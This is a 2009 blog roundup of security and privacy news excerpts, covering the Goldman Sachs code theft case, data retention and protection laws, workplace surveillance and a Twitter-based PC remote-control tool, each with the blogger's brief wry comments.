Monday, July 06, 2009

How big is this one? Too complex (or to scary) for network news?

http://developers.slashdot.org/story/09/07/06/0353217/Goldman-Sachs-Trading-Source-Code-In-the-Wild?from=rss

Goldman Sachs Trading Source Code In the Wild?

Posted by ScuttleMonkey on Monday July 06, @08:31AM from the bunny-ball-ball dept. business court

Hangtime writes

"The world's most valuable source code could be in the wild. According to a report by Reuters, a Russian immigrant and former Goldman Sachs developer named Sergey Aleynikov was picked up at Newark Airport on July 4th by the FBI on charges of industrial espionage. According to the complaint, Sergey prior to his early June exit from Goldman copied, encrypted, and uploaded source code inferred to be the code used by Goldman Sachs to process in real-time (micro-seconds) trades between multiple equity and commodity platforms. While trying to cover his tracks, the system backed up a series of bash commands so he was unable to erase his history that would later give him away to Goldman and the authorities. So the question, where are the 32MB of encrypted files that Sergey uploaded to a German server?

[From the ZeroHedge article:

This week's NYSE Program Trading report was very odd: not only because program trading hit 48.6% of all NYSE trading, a record high at least since the NYSE keep tabs of this data, and a data point which in itself was startling enough to cause some serious red flags as I jaunt from village to village in what little is left of Europe's bison country, but what was shocking was the disappearance of the #1 mainstay of complete trading domination (i.e., Goldman Sachs) from not just the aforementioned #1 spot, but the entire complete list. In other words: Goldman went from 1st to N/A in one week.

… Another major question: do Goldman and the NYSE not have a fiduciary responsibility to announce to both shareholders and any interested parties if there has been a major security breach in their trading operations? Certainly this seems like a material piece of information: given that program trading accounted for 49% of all NYSE trading last week, and Goldman as recently as one week ago represented about 60% of all principal program trading, will this be called an issue threatening the National Security of the United States. Shouldn't all market participants be aware that there is some rogue code in cyberspace that can be abused by the highest bidder, who very likely will not be interested in proving the efficient market hypothesis?

… The complete affidavit can be downloaded from this post here



Coming soon to a country near you.

http://www.pogowasright.org/?p=1338

New cellphone laws in Zambia

July 5, 2009 by Dissent Filed under Businesses, Govt, Legislation, Non-U.S.

Experts have lambasted new laws to collect information about prepaid cellphone users, citing their “severe” privacy implications.

One academic described existing rules that forced operators to retain personal call data for a minimum of three years as “excessive”.

And as of last Wednesday the government will collect more data. Operators now have to obtain the full name, address and identity number of customers buying SIM cards for prepaid services. MTN, Vodacom and Cell C have been given 18 months to get this information from customers.

Read more in the Pretoria News.

[From the article:

… Charles Goredema, the head of organised crime research at the Institute of Security Studies in Cape Town, said he failed to see "any link between (the legislation) and combating organised crime".

He said the new law "contravened the right to privacy" and that the idea was to widen the amount of information accessible to police with no specific end other than to hoard as much data as possible.

… He also pointed out the confusion that would be caused if users swopped SIM cards en masse. "The system would then have no idea who it is actually tracking. It is, after all, ultimately tracking a SIM, not a person."

… Hosein views the three to five-year period as excessive.

"All the studies have shown that a minimum period of three months tends to be sufficient, with nine months at the maximum, three years is excessive. In fact, any retention period is excessive. Canada, the US, Australia, New Zealand, and a host of other countries have no retention period at all.

"And they all face the same challenges, so why the difference?" [None, but we will eventually point to their laws as justification for similar laws here. Bob]


(Related) We want a law like this one too, don't we?

http://www.livemint.com/2009/07/05204206/Data-protection-amendments-se.html?h=B

Data protection: amendments set the ball rolling on liability

Two of the major sectors of the Indian economy, IT and BPO, have access have access to personal data, yet there is no express legislation in place to deal with data protection

… Section 43A states that if a “body corporate” possessing, dealing or handling any “sensitive personal data or information” in a computer resource which it owns, controls or operates is negligent in implementing and maintaining “reasonable security practices and procedures”, and thereby causes wrongful loss or wrongful gain to any person, this body corporate will become liable to pay damages as compensation to the affected person.

The term “body corporate” is wide enough to include a company, a firm, sole proprietorship or other association of individuals engaged in professional or commercial activities. Then there is the question of what constitutes “reasonable security practices and procedures”.

… This essentially means that contracting parties could incorporate in their contract the level and extent of the security procedures, practices and protection that the disclosing party desires to put in place in order to protect its sensitive personal information. A breach of such provisions, if falling within the purview of section 43A, could make the receiving party liable to pay damages.


(Related) Takes a bit of reading to understand, but in short, the law is like swiss cheese...

http://www.databreaches.net/?p=5991

NV’s New Encryption Law Made Moot?

July 6, 2009 by admin Filed under Breach Laws, Commentaries and Analyses, Legislation, State/Local

Rebecca Herold of IT Compliance has a commentary on Nevada’s new encryption law and whether the state’s data breach law makes the encryption law moot. It begins:

On May 30, 2009, Nevada enacted a new law, SB 227, which will basically replace NRS 597.970 in January 2010.

In many ways the new law is an improvement over the much more vague, and brief, NRS 597.970. I want to focus here on an improvement, but something that still leaves much to interpretation; that is, what is meant by “encryption”?

According to NRS 205.4742,

“‘Encryption’ means the use of any protective or disruptive measure, including, without limitation, cryptography, enciphering, encoding or a computer contaminant, to: 1. Prevent, impede, delay or disrupt access to any data, information, image, program, signal or sound; 2. Cause or make any data, information, image, program, signal or sound unintelligible or unusable; or 3. Prevent, impede, delay or disrupt the normal operation or use of any component, device, equipment, system or network.”

Read more on IT Compliance.

[From the article:

So, what's the motivation for oranizations to actually use strong encryption if the breach law will not require the organizations to report a breach of PII that is simply scrambled? As the laws are written, an organization with a breach of simply scrambled PII would be liable for damages under SB 227, but according to SB 347 they wouldn't need to report such a breach, so who would know?



Can a technology as simple to use as Facebook seriously compromise security? Sure. But everybody is doing it. The wife shouldn't know anything too sensitive. Better most of this comes from them than just show up in the tabloids. Pick your favorite excuse...

http://www.pogowasright.org/?p=1319

Spy chief’s family details on Facebook

July 5, 2009 by Dissent Filed under Featured Headlines, Internet, Non-U.S.

The Daily Mail reports that personal and family details of Sir John Sawers, the new head of MI6, were exposed after his wife published intimate photographs and family details on her Facebook page. According to the paper, “Amazingly, she had put virtually no privacy protection on her account, making it visible to any of the site’s 200 million users who chose to be in the open-access ‘London’ network - regardless of where in the world they actually were.” The paper reproduced the photos in their paper after notifying the Foreign Office, who in turn, contacted Facebook to remove the family’s details. The exposed details reportedly included the location of his London residence and the whereabouts of his grown children.

Not everyone thinks this is a big deal in terms of a security breach, though. While The Times calls it a “major security breach,” and The BBC reports that some British politicians are calling the details a security lapse that leaves the incoming MI6 chief vulnerable to blackmail and criticism, others see the incident as no more than mildly embarrassing. The Guardian quotes Foreign Secretary David Miliband as reacting, “It’s not a state secret that he wears Speedo swimming trunks.” “Let’s grow up.”



We love our employees, we just don't trust them.

http://www.pogowasright.org/?p=1342

DSS takes employee monitoring to new level

July 5, 2009 by Dissent Filed under Non-U.S., Surveillance, Workplace

DSS Co Ltd, a Japanese firm that edits and processes digital maps based on survey data, started a service of recording the actions of factory workers for long hours and visualize them.

The tools used for collecting the data are (1) the “ankle sensor” to be attached to the leg of a worker for recording his or her movement, (2) the “milestone,” which will be installed in various places in the plant to know how long workers stay there and (3) the “small video camera” to be put in the chest pocket of the worker to record his or her action.

Read more and see photos of the devices on Tech-On!. Engadget’s Vladislav Savov comments:

Sure, you might find out Bob in accounting takes a really long lunch, but do you really need to spend $20,000 and piss off your entire workforce to prove that? Just stalk his Tweets and Facebook status updates like a good old-fashioned employer would do.


(Related) Maybe HP snooping at board member and reporter phone records wasn't so far outside the norm?

http://www.pogowasright.org/?p=1361

Deutsche Bank spied on employees

July 5, 2009 by Dissent Filed under Businesses, Non-U.S., Surveillance, Workplace

Germany’s biggest bank, Deutsche Bank, hired detectives to spy on its employees including a member of its supervisory board, managers and a shareholder, German magazine Der Spiegel reported.

The bank launched an internal inquiry at the end of May into potential breaches of data privacy law in connection with the affair, Spiegel said in its latest edition to be published Monday.

Chief executive Josef Ackermann promised a “zero tolerance” approach over the affair at an annual general meeting of the bank.

Detectives “kept an eye on the movements of these people, and made inquiries as to who they were meeting and when”, said Spiegel, which had seen a report by a law firm on the matter.

Read more in The Local (de)



Is this even possible?

http://www.pogowasright.org/?p=1384

Barring Internet access for criminals

July 6, 2009 by Dissent Filed under Court, Internet, Legislation, U.S.

Defendants in criminal proceedings are imposed conditions or restrictions when granted supervised release. Now with Internet crimes on the rise, United States (U.S.) courts are imposing the prohibition from accessing the Internet as condition of supervised release. The prohibition from accessing the Internet may be imposed as initial condition or may be added as modification of supervised release conditions. But, is this prohibition legal? and how does it fit federal sentencing guidelines? All those questions were answered by the IBLS INTERNET LAW specialists at ibls.com.

Read more on Ecommerce Journal.

[From the article:

The prohibition from accessing the Internet fits well the federal sentence guideline’s factors enumerated in 18 U.S.C. § 3553(a), when the underline crime was committed through the use of the Internet.



Everyone should understand this by now – but they don't

http://www.wired.com/techbiz/it/magazine/17-07/mf_freer

Tech Is Too Cheap to Meter: It's Time to Manage for Abundance, Not Scarcity

By Chris Anderson 06.22.09

… All this was possible because Alan Kay, an engineer at Xerox's Palo Alto Research Center in the 1970s, understood what Moore's law was doing to the cost of computing. He decided to do what writer George Gilder calls "wasting transistors." Rather than reserve computing power for core information processing, Kay used outrageous amounts of it for frivolous stuff like drawing cartoons on the screen. Those cartoons—icons, windows, pointers, and animations—became the graphical user interface and eventually the Mac. By 1970s IT standards, Kay had "wasted" computing power. But in doing so he made computers simple enough for all of us to use. And then we changed the world by finding applications for them that the technologists had never dreamed of.

Scarcity vs. Abundance Management

Scarcity Abundance

Rules Everything is forbidden unless it is permitted. Everything is permitted unless it is forbidden.

Social model Paternalism ("We know what's best") Egalitarianism ("You know what's best")


Profit plan Business model We'll figure it out

Decision

process Top-down Bottom-up

Organizational

structure Command and control Out of control

Free: The Future of a Radical Price Download the audiobook » (285 MB .zip)

(Related)

http://www.wired.com/techbiz/it/magazine/16-03/ff_free

Free! Why $0.00 Is the Future of Business


(Related) But I bet he won't invest in my anti-gravity research...

http://news.cnet.com/8301-19882_3-10279763-250.html?part=rss&subj=news&tag=2547-1_3-0-5

Steve Jurvetson: Only investing in the unknown

by Rafe Needleman July 6, 2009 3:59 AM PDT

Since I started covering start-ups for Red Herring back in 1998, no venture capitalist has entertained me as much, or made me as envious, as Steve Jurvetson of Draper Fisher Jurvetson. He's of the few real dilettantes in the field, and he actually makes money from a studied lack of focus.

In comparison, most tech VCs, including titans like Vinod Khosla (at Kleiner Perkins) and Marc Andreessen, who just launched a new fund, focus on industry segments or coherent visions for certain markets. Khosla, for example, is a modern industrialist currently investing in companies attached to renewable energy or green products. Andreessen is all about Web start-ups.

Jurvetson? If other people are investing in it, he thinks it's passe.



An interesting business model for my students to explore...

http://news.slashdot.org/story/09/07/05/1546214/We-Rent-Movies-So-Why-Not-Textbooks?from=rss

We Rent Movies, So Why Not Textbooks?

Posted by Soulskill on Sunday July 05, @12:26PM from the or-food dept. education

Hugh Pickens writes

"Using Netflix as a business model, Osman Rashid and Aayush Phumbhra founded Chegg, shorthand for 'chicken and egg,' to gather books from sellers at the end of a semester and renting — or sometimes selling — them to other students at the start of a new one. Chegg began renting books in 2007, before it owned any, so when an order came in, its employees would surf the Web to find a cheap copy. They would buy the book using Rashid's American Express card and have it shipped to the student. Eventually, Chegg automated the system. 'People thought we were crazy,' Rashid said. Now, as Chegg prepares for its third academic year in the textbook rental business, the business is growing rapidly. Jim Safka, a former chief executive of Match.com and Ask.com who was recently recruited to run Chegg, said the company's revenue in 2008 was more than $10 million, and this year, Chegg surpassed that in January alone."



A simple suggestion for my hacking students. Take control of remote computers for fun a profit! (Find the answers to the hacking final on my computer and guarantee yourself an “A”)

http://www.labnol.org/software/control-computer-with-email-or-sms/9229/

July 3, 2009

How to Remote Control your Windows PC with Email or SMS

… You first install the free TweetMyPC utility on any Windows PC and associate your Twitter account. The app will silently monitor your Twitter stream every minute for any desktop commands and if it finds one, will act upon it immediately. The initial version of TweetMyPC was limited to basic shutdown and restart commands, however the current v2 has a far more robust set of commands, enabling a far more useful way of getting your PC to carry out certain tasks especially when you’re AFK (Away From Keyboard).

No comments: